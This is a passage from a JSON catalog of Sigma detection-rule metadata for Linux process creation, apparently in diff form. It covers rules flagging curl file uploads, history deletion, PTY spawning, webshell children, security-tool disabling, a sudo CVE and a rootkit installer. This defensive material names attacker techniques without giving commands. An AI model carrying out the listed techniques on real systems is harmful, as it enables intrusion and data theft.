- }, - { - "description": "Detects potential overwriting and deletion of a file using DD.", - "uuid": "2953194b-e33c-4859-b9e8-05948c167447", - "value": "DD File Overwrite", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-2---macoslinux---overwrite-file-with-dd", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_dd_file_overwrite.yml" - ], - "tags": [ - "attack.impact", - "attack.t1485" - ], - "creation_date": "2021/10/15", - "filename": "proc_creation_lnx_dd_file_overwrite.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", - "level": "low", - "falsepositive": [ - "Any user deleting files that way." - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does.", - "uuid": "067d8238-7127-451c-a9ec-fa78045b618b", - "value": "Linux Doas Tool Execution", - "meta": { - "refs": [ - "https://research.splunk.com/endpoint/linux_doas_tool_execution/", - "https://www.makeuseof.com/how-to-install-and-use-doas/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1548" - ], - "creation_date": "2022/01/20", - "filename": "proc_creation_lnx_doas_execution.yml", - "author": "Sittikorn S, Teoderick Contreras", - "level": "low", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects usage of system utilities to discover files and directories", - "uuid": "d3feb4ee-ff1d-4d3d-bd10-5b28a238cc72", - "value": "File and Directory Discovery - Linux", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_file_and_directory_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1083" - ], - "creation_date": "2020/10/19", - "filename": "proc_creation_lnx_file_and_directory_discovery.yml", - "author": "Daniil Yugoslavskiy, oscd.community", - "level": "informational", - "falsepositive": [ - "Legitimate activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects file deletion using \"rm\", \"shred\" or \"unlink\" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity", - "uuid": "30aed7b6-d2c1-4eaf-9382-b6bc43e50c57", - "value": "File Deletion", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.004" - ], - "creation_date": "2020/10/07", - "filename": "proc_creation_lnx_file_deletion.yml", - "author": "\u00d6mer G\u00fcnal, oscd.community", - "level": "informational", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s", - "uuid": "78a80655-a51e-4669-bc6b-e9d206a462ee", - "value": "Install Root Certificate", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_install_root_certificate.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1553.004" - ], - "creation_date": "2020/10/05", - "filename": "proc_creation_lnx_install_root_certificate.yml", - "author": "\u00d6mer G\u00fcnal, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects enumeration of local systeam accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.", - "uuid": "b45e3d6f-42c6-47d8-a478-df6bd6cf534c", - "value": "Local System Accounts Discovery - Linux", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_local_account.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087.001" - ], - "creation_date": "2020/10/08", - "filename": "proc_creation_lnx_local_account.yml", - "author": "Alejandro Ortuno, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings", - "uuid": "676381a6-15ca-4d73-a9c8-6a22e970b90d", - "value": "Local Groups Discovery - Linux", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_local_groups.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1069.001" - ], - "creation_date": "2020/10/11", - "filename": "proc_creation_lnx_local_groups.yml", - "author": "\u00d6mer G\u00fcnal, Alejandro Ortuno, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects enumeration of local or remote network services.", - "uuid": "3e102cd9-a70d-4a7a-9508-403963092f31", - "value": "Linux Network Service Scanning", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_network_service_scanning.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1046" - ], - "creation_date": "2020/10/21", - "filename": "proc_creation_lnx_network_service_scanning.yml", - "author": "Alejandro Ortuno, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments", - "uuid": "e4ffe466-6ff8-48d4-94bd-e32d1a6061e2", - "value": "Nohup Execution", - "meta": { - "refs": [ - "https://gtfobins.github.io/gtfobins/nohup/", - "https://en.wikipedia.org/wiki/Nohup", - "https://www.computerhope.com/unix/unohup.htm", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_nohup.yml" - ], - "tags": "No established tags", - "creation_date": "2022/06/06", - "filename": "proc_creation_lnx_nohup.yml", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", - "level": "medium", - "falsepositive": [ - "Administrators or installed processes that leverage nohup" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell.\nScript being executed gets created as a temp file in /tmp folder with a scx* prefix.\nThen it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/.\nThe file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\nMicrosoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.\n", - "uuid": "6eea1bf6-f8d2-488a-a742-e6ef6c1b67db", - "value": "OMIGOD SCX RunAsProvider ExecuteScript", - "meta": { - "refs": [ - "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", - "https://github.com/Azure/Azure-Sentinel/pull/3059", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executescript.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.initial_access", - "attack.execution", - "attack.t1068", - "attack.t1190", - "attack.t1203" - ], - "creation_date": "2021/10/15", - "filename": "proc_creation_lnx_omigod_scx_runasprovider_executescript.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", - "level": "high", - "falsepositive": [ - "Legitimate use of SCX RunAsProvider ExecuteScript." - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell.\nSCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\nMicrosoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.\n", - "uuid": "21541900-27a9-4454-9c4c-3f0a4240344a", - "value": "OMIGOD SCX RunAsProvider ExecuteShellCommand", - "meta": { - "refs": [ - "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", - "https://github.com/Azure/Azure-Sentinel/pull/3059", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.initial_access", - "attack.execution", - "attack.t1068", - "attack.t1190", - "attack.t1203" - ], - "creation_date": "2021/10/15", - "filename": "proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", - "level": "high", - "falsepositive": [ - "Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand." - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects process discovery commands. Adversaries may attempt to get information about running processes on a system.\nInformation obtained could be used to gain an understanding of common software/applications running on systems within the network\n", - "uuid": "4e2f5868-08d4-413d-899f-dc2f1508627b", - "value": "Process Discovery", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_process_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1057" - ], - "creation_date": "2020/10/06", - "filename": "proc_creation_lnx_process_discovery.yml", - "author": "\u00d6mer G\u00fcnal, oscd.community", - "level": "informational", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects setting proxy configuration", - "uuid": "72f4ab3f-787d-495d-a55d-68c2ff46cf4c", - "value": "Connection Proxy", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1090/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_proxy_connection.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1090" - ], - "creation_date": "2020/06/17", - "filename": "proc_creation_lnx_proxy_connection.yml", - "author": "\u00d6mer G\u00fcnal", - "level": "low", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects python spawning a pretty tty", - "uuid": "c4042d54-110d-45dd-a0e1-05c47822c937", - "value": "Python Spawning Pretty TTY", - "meta": { - "refs": [ - "https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2022/06/03", - "filename": "proc_creation_lnx_python_pty_spawn.yml", - "author": "Nextron Systems", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects the enumeration of other remote systems.", - "uuid": "11063ec2-de63-4153-935e-b1a8b9e616f1", - "value": "Linux Remote System Discovery", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_remote_system_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1018" - ], - "creation_date": "2020/10/22", - "filename": "proc_creation_lnx_remote_system_discovery.yml", - "author": "Alejandro Ortuno, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.", - "uuid": "6b14bac8-3e3a-4324-8109-42f0546a347f", - "value": "Scheduled Cron Task/Job - Linux", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_schedule_task_job_cron.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1053.003" - ], - "creation_date": "2020/10/06", - "filename": "proc_creation_lnx_schedule_task_job_cron.yml", - "author": "Alejandro Ortuno, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects usage of system utilities (only grep and egrep for now) to discover security software discovery", - "uuid": "c9d8b7fd-78e4-44fe-88f6-599135d46d60", - "value": "Security Software Discovery - Linux", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1518.001" - ], - "creation_date": "2020/10/19", - "filename": "proc_creation_lnx_security_software_discovery.yml", - "author": "Daniil Yugoslavskiy, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects disabling security tools", - "uuid": "e3a8a052-111f-4606-9aee-f28ebeb76776", - "value": "Disabling Security Tools", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.004" - ], - "creation_date": "2020/06/17", - "filename": "proc_creation_lnx_security_tools_disabling.yml", - "author": "\u00d6mer G\u00fcnal, Alejandro Ortuno, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services", - "uuid": "de25eeb8-3655-4643-ac3a-b662d3f26b6b", - "value": "Disable Or Stop Services", - "meta": { - "refs": [ - "https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/09/15", - "filename": "proc_creation_lnx_services_stop_and_disable.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects suspicious change of file privileges with chown and chmod commands", - "uuid": "c21c4eaa-ba2e-419a-92b2-8371703cbe21", - "value": "Setuid and Setgid", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.001/T1548.001.md", - "https://attack.mitre.org/techniques/T1548/001/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_setgid_setuid.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2020/06/16", - "filename": "proc_creation_lnx_setgid_setuid.yml", - "author": "\u00d6mer G\u00fcnal", - "level": "low", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287", - "uuid": "f74107df-b6c6-4e80-bf00-4170b658162b", - "value": "Sudo Privilege Escalation CVE-2019-14287", - "meta": { - "refs": [ - "https://www.openwall.com/lists/oss-security/2019/10/14/1", - "https://access.redhat.com/security/cve/cve-2019-14287", - "https://twitter.com/matthieugarin/status/1183970598210412546", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_sudo_cve_2019_14287.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068", - "attack.t1548.003", - "cve.2019.14287" - ], - "creation_date": "2019/10/15", - "filename": "proc_creation_lnx_sudo_cve_2019_14287.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects chmod targeting files in abnormal directory paths.", - "uuid": "6419afd1-3742-47a5-a7e6-b50386cd15f8", - "value": "Chmod Suspicious Directory", - "meta": { - "refs": [ - "https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_chmod_directories.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1222.002" - ], - "creation_date": "2022/06/03", - "filename": "proc_creation_lnx_susp_chmod_directories.yml", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", - "level": "medium", - "falsepositive": [ - "Admin changing file permissions." - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects a suspicious curl process start the adds a file to a web request", - "uuid": "00b90cc1-17ec-402c-96ad-3a8117d7a582", - "value": "Suspicious Curl File Upload - Linux", - "meta": { - "refs": [ - "https://twitter.com/d1r4c/status/1279042657508081664", - "https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file", - "https://curl.se/docs/manpage.html", - "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1567", - "attack.t1105" - ], - "creation_date": "2022/09/15", - "filename": "proc_creation_lnx_susp_curl_fileupload.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Scripts created by developers and admins" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects a suspicious curl process start on linux with set useragent options", - "uuid": "b86d356d-6093-443d-971c-9b07db583c68", - "value": "Suspicious Curl Change User Agents - Linux", - "meta": { - "refs": [ - "https://curl.se/docs/manpage.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ], - "creation_date": "2022/09/15", - "filename": "proc_creation_lnx_susp_curl_useragent.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Scripts created by developers and admins", - "Administrative activity" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity", - "uuid": "1182f3b3-e716-4efa-99ab-d2685d04360f", - "value": "History File Deletion", - "meta": { - "refs": [ - "https://github.com/sleventyeleven/linuxprivchecker/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml" - ], - "tags": [ - "attack.impact", - "attack.t1565.001" - ], - "creation_date": "2022/06/20", - "filename": "proc_creation_lnx_susp_history_delete.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance", - "uuid": "d7821ff1-4527-4e33-9f84-d0d57fa2fb66", - "value": "Print History File Contents", - "meta": { - "refs": [ - "https://github.com/sleventyeleven/linuxprivchecker/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml" - ], - "tags": [ - "attack.reconnaissance", - "attack.t1592.004" - ], - "creation_date": "2022/06/20", - "filename": "proc_creation_lnx_susp_history_recon.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects suspicious interactive bash as a parent to rather uncommon child processes", - "uuid": "ea3ecad2-db86-4a89-ad0b-132a10d2db55", - "value": "Interactive Bash Suspicious Children", - "meta": { - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml" - ], - "tags": "No established tags", - "creation_date": "2022/03/14", - "filename": "proc_creation_lnx_susp_interactive_bash.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Legitimate software that uses these patterns" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects java process spawning suspicious children", - "uuid": "d292e0af-9a18-420c-9525-ec0ac3936892", - "value": "Suspicious Java Children Processes", - "meta": { - "refs": [ - "https://www.tecmint.com/different-types-of-linux-shells/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_java_children.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2022/06/03", - "filename": "proc_creation_lnx_susp_java_children.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell", - "uuid": "880973f3-9708-491c-a77b-2a35a1921158", - "value": "Linux Shell Pipe to Shell", - "meta": { - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1140" - ], - "creation_date": "2022/03/14", - "filename": "proc_creation_lnx_susp_pipe_shell.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Legitimate software that uses these patterns" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects events with patterns found in commands used for reconnaissance on linux systems", - "uuid": "0cf7a157-8879-41a2-8f55-388dd23746b7", - "value": "Linux Recon Indicators", - "meta": { - "refs": [ - "https://github.com/sleventyeleven/linuxprivchecker/blob/0d701080bbf92efd464e97d71a70f97c6f2cd658/linuxprivchecker.py", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_recon_indicators.yml" - ], - "tags": [ - "attack.reconnaissance", - "attack.t1592.004", - "attack.credential_access", - "attack.t1552.001" - ], - "creation_date": "2022/06/20", - "filename": "proc_creation_lnx_susp_recon_indicators.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects system information discovery commands", - "uuid": "42df45e7-e6e9-43b5-8f26-bec5b39cc239", - "value": "System Information Discovery", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_system_info_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1082" - ], - "creation_date": "2020/10/08", - "filename": "proc_creation_lnx_system_info_discovery.yml", - "author": "\u00d6mer G\u00fcnal, oscd.community", - "level": "informational", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects usage of system utilities to discover system network connections", - "uuid": "4c519226-f0cd-4471-bd2f-6fbb2bb68a79", - "value": "System Network Connections Discovery - Linux", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_system_network_connections_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1049" - ], - "creation_date": "2020/10/19", - "filename": "proc_creation_lnx_system_network_connections_discovery.yml", - "author": "Daniil Yugoslavskiy, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects enumeration of local network configuration", - "uuid": "e7bd1cfa-b446-4c88-8afb-403bcd79e3fa", - "value": "System Network Discovery - Linux", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1016" - ], - "creation_date": "2020/10/06", - "filename": "proc_creation_lnx_system_network_discovery.yml", - "author": "\u00d6mer G\u00fcnal and remotephone, oscd.community", - "level": "informational", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects execution of a the file \"execve_hijack\" which is used by the Triple Cross rootkit as a way to elevate privileges", - "uuid": "0326c3c8-7803-4a0f-8c5c-368f747f7c3e", - "value": "Triple Cross eBPF Rootkit Execve Hijack", - "meta": { - "refs": [ - "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation" - ], - "creation_date": "2022/07/05", - "filename": "proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects default install commands of the Triple Cross eBPF rootkit based on the \"deployer.sh\" script", - "uuid": "22236d75-d5a0-4287-bf06-c93b1770860f", - "value": "Triple Cross eBPF Rootkit Install Commands", - "meta": { - "refs": [ - "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1014" - ], - "creation_date": "2022/07/05", - "filename": "proc_creation_lnx_triple_cross_rootkit_install.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects suspicious sub processes of web server processes", - "uuid": "818f7b24-0fba-4c49-a073-8b755573b9c7", - "value": "Linux Webshell Indicators", - "meta": { - "refs": [ - "https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/", - "https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ], - "creation_date": "2021/10/15", - "filename": "proc_creation_lnx_webshell_detection.yml", - "author": "Florian Roth, Nasreddine Bencherchali (update)", - "level": "high", - "falsepositive": [ - "Web applications that invoke Linux command line tools" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects additions to the Emond Launch Daemon that adversaries may use to gain persistence and elevate privileges.", - "uuid": "23c43900-e732-45a4-8354-63e4a6c187ce", - "value": "MacOS Emond Launch Daemon", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.014/T1546.014.md", - "https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/file_event/file_event_macos_emond_launch_daemon.yml" - ], - "tags": [ - "attack.persistence", - 